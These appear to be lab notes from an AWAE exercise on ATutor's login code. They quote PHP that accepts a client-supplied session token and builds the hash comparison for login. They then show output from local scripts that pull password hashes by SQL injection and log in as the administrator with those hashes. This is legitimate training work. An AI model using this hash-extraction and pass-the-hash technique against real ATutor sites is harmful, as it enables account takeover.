In /opt/lampp/htdocs/ATutor/login.php:

define('AT_INCLUDE_PATH', 'include/');
require (AT_INCLUDE_PATH.'vitals.inc.php');
include(AT_INCLUDE_PATH.'login_functions.inc.php');



In /opt/lampp/htdocs/ATutor/include/login_functions.inc.php:

if (isset($_POST['token']))
{
    $_SESSION['token'] = $_POST['token'];
}
else
{
    if (!isset($_SESSION['token']))
        $_SESSION['token'] = sha1(mt_rand() . microtime(TRUE));
}

...

if (isset($cookie_login, $cookie_pass) && !isset($_POST['submit'])) {
    /* auto login */
    $this_login        = $cookie_login;
    $this_password    = $cookie_pass;
    $auto_login        = 1;
    $used_cookie    = true;
} else if (isset($_POST['submit'])) {
    /* form post login */
    $this_password = $_POST['form_password_hidden'];
    $this_login        = $_POST['form_login'];
    $auto_login        = isset($_POST['auto']) ? intval($_POST['auto']) : 0;
    $used_cookie    = false;
} else if (isset($_POST['submit1'])) {
    /* form post login on autoenroll registration*/
    $this_password = $_POST['form1_password_hidden'];
    $this_login        = $_POST['form1_login'];
    $auto_login        = isset($_POST['auto']) ? intval($_POST['auto']) : 0;
    $used_cookie    = false;
}

if (isset($this_login, $this_password)) {

...

if ($used_cookie) {
        #4775: password now store with salt
        $rows = queryDB("SELECT password, last_login FROM %smembers WHERE login='%s'", array(TABLE_PREFIX, $this_login), TRUE);
        $cookieRow = $rows;
        $saltedPassword = hash('sha512', $cookieRow['password'] . hash('sha512', $cookieRow['last_login']));
        $row = queryDB("SELECT member_id, login, first_name, second_name, last_name, preferences,password AS pass, language, status, last_login FROM %smembers WHERE login='%s' AND '%s'='%s'", array(TABLE_PREFIX, $this_login, $saltedPassword, $this_password), TRUE);
    } else {
        $row = queryDB("SELECT member_id, login, first_name, second_name, last_name, preferences, language, status, password AS pass, last_login FROM %smembers WHERE (login='%s' OR email='%s') AND SHA1(CONCAT(password, '%s'))='%s'", array(TABLE_PREFIX, $this_login, $this_login, $_SESSION['token'], $this_password), TRUE);
    }

...

}



$ python3 /home/rockylinux/Documents/AWAE/3.8/atutor_gethash.py localhost
(+) Retrieving database version length....
10
(+) Retrieving database version....
5.6.20-log
(+) Retrieving username length....
6
(+) Retrieving username....
atutor
(+) Retrieving password hash length....
40
(+) Retrieving password hash....
4b863fcf722bd871226ec1207b77424c5a5ebbc8
(+) Retrieving admin username length....
20
(+) Retrieving admin username....
atutor_administrator
(+) Retrieving admin password hash length....
40
(+) Retrieving admin password hash....
4b863fcf722bd871226ec1207b77424c5a5ebbc8
(+) Checking if the database user has SUPER privilege...
Yes
(+) done!



$ python3 /home/rockylinux/Documents/AWAE/3.8/poc5.py localhost atutor 4b863fcf722bd871226ec1207b77424c5a5ebbc8
(+) success!



$ python3 /home/rockylinux/Documents/AWAE/3.8/poc5.py localhost atutor_administrator 4b863fcf722bd871226ec1207b77424c5a5ebbc8
(+) success!
